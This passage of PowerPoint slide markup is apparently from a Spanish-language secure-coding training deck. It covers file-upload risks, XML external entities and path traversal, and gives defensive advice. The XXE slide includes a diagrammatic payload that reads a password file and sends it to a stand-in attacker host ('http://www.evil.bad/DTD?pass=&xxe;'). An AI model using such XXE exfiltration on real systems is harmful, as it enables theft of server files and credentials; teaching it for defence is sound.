        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Documento</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Confidencia</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="42" name="Curved Connector 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E17861D-E57E-7E45-AA04-7C96B7117C7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="26" idx="4"/>
            <a:endCxn id="17" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3779578" y="2661064"/>
            <a:ext cx="790914" cy="1655429"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">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6" name="Graphic 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CCDA086-16BD-664F-8724-43B5B3A56D88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">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rcRect l="16250" t="49342" r="67319" b="229"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4376183" y="2963824"/>
            <a:ext cx="232401" cy="292999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52" name="Graphic 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB325088-1CBE-1845-9F83-5B69ACCC4E1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">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rcRect l="16250" t="49342" r="67319" b="229"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4608584" y="3684801"/>
            <a:ext cx="232401" cy="292999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53" name="Graphic 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B2DD4FC-000F-EF40-A39A-37EBDD857261}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">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rcRect l="16250" t="49342" r="67319" b="229"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2011545" y="3525022"/>
            <a:ext cx="232401" cy="292999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Graphic 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{921835DC-FD13-8D43-B42D-06E747C428DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">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rcRect l="16250" t="49342" r="67319" b="229"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2217520" y="2794475"/>
            <a:ext cx="232401" cy="292999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0C6889B-03F6-BE4B-BDF0-0FAB1792E79F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7424407" y="1259242"/>
            <a:ext cx="3434638" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0"/>
              <a:t>Los servidores que permiten la carga de archivos deben prevenir la carga de ejecutables y scripts, utilizando una lista de extensiones permitidas y cambiando la extensión del archivo en el servidor luego de ser cargado</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Google Shape;91;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{143FC9DD-9C67-CE21-4DC1-A906FC8F979D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186475" y="335525"/>
            <a:ext cx="15594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Y" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ataque-Gramas</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="16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74380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0E994-0686-6266-ED23-140DFEC61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6EC3EB-D509-C45B-9C23-61C1FF82A603}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2333720" y="326460"/>
            <a:ext cx="10515600" cy="549275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" b="1" dirty="0"/>
              <a:t>Entidades Externas XML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8162E86F-CBEC-0E0C-5752-61B2F6DF4083}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8087314" y="1752670"/>
            <a:ext cx="3434638" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0"/>
              <a:t>Las aplicaciones que procesan documentos XML deben deshabilitar el procesamiento de entidades </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1"/>
              <a:t>externals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0"/>
              <a:t>Las entidades </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1"/>
              <a:t>external</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0"/>
              <a:t> XML pueden divulgar contenido de archivos alojados en el servidor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Google Shape;91;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4FB8F93-9B9A-260C-6677-1E65811EAD51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186475" y="335525"/>
            <a:ext cx="15594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Y" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ataque-Gramas</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="Google Shape;435;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1889278" y="2387404"/>
            <a:ext cx="4163128" cy="3154669"/>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9900"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>&lt; /&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Google Shape;436;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2005439" y="2899580"/>
            <a:ext cx="3994762" cy="2324996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="2745"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000"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chemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437" name="Google Shape;437;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="599858" y="2238205"/>
            <a:ext cx="1534900"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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>XML Processor</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="438" name="Google Shape;438;p27" descr="Picture 21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="80810" t="32962" r="2089" b="37636"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1011656" y="1369846"/>
            <a:ext cx="718458" cy="872838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="439" name="Google Shape;439;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2178042" y="3153538"/>
            <a:ext cx="3934743" cy="26568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Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Include /app/password file as &amp;xxe;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="tx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ts val="2400"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Link to: http://www.evil.bad/DTD?pass=&amp;xxe;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C00000"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Google Shape;440;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1659104" y="1792426"/>
            <a:ext cx="2621467" cy="803"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="21600"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="44450" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="C00000">
                <a:alpha val="75686"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="8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sp>
        <p:nvSpPr>
          <p:cNvPr id="441" name="Google Shape;441;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1731992" y="1346100"/>
            <a:ext cx="3205883"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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>/DTD?pass=jmttN9YC4bK</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="442" name="Google Shape;442;p27" descr="Picture 38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="80810" t="61895" r="2089" b="6903"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4184253" y="1340302"/>
            <a:ext cx="718457" cy="926275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="Google Shape;443;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3835225" y="2297881"/>
            <a:ext cx="1416600" cy="3693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563C1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>www.evil.mal</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444" name="Google Shape;444;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1367518" y="2571292"/>
            <a:ext cx="3257" cy="2574879"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="21600" y="21600"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="44450" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="C00000">
                <a:alpha val="55686"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="8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sp>
        <p:nvSpPr>
          <p:cNvPr id="445" name="Google Shape;445;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3231906" y="5552087"/>
            <a:ext cx="1534900"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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>XML Document</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="446" name="Google Shape;446;p27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="891332" y="4589614"/>
            <a:ext cx="959105" cy="1322337"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="959103" cy="1322336"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="447" name="Google Shape;447;p27" descr="Graphic 16"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3300" y="0"/>
              <a:ext cx="952501" cy="952500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="448" name="Google Shape;448;p27"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="953045"/>
              <a:ext cx="959103"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chemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Atacante</a:t>
              </a:r>
              <a:endParaRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="986835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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE33E449-6A50-C940-ADC5-25A3B97CA7E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810" t="61896" r="2089" b="6904"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1567765" y="2197851"/>
            <a:ext cx="349049" cy="450014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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3" cstate="screen">
            <a:alphaModFix amt="53000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="80810" t="32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3382395" y="1672003"/>
            <a:ext cx="875012" cy="1063032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B47C3C7-1406-1E4B-AA89-63A52DA31801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2279122" y="294343"/>
            <a:ext cx="10515600" cy="549275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Path Traversal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8D73A4-34F7-BB4F-A702-D68B3A75FFA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4173095" y="1807489"/>
            <a:ext cx="2766027" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>file.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0143C41B-0369-DF42-8D23-CD96297C5EB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3026049" y="4256853"/>
            <a:ext cx="1667444" cy="1442271"/>
            <a:chOff x="1345136" y="3444526"/>
            <a:chExt cx="1667444" cy="1442271"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="Graphic 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E9B8A2A-1A9D-7742-A5FF-32C355FA5C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93270576-9AC6-5147-9955-7029A4B44A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6BC41E3C-7C7A-034A-8B7E-41549B3D4C3C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1345136" y="4579020"/>
              <a:ext cx="1667444" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="es-UY" dirty="0"/>
                <a:t>Usuarios comunes</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
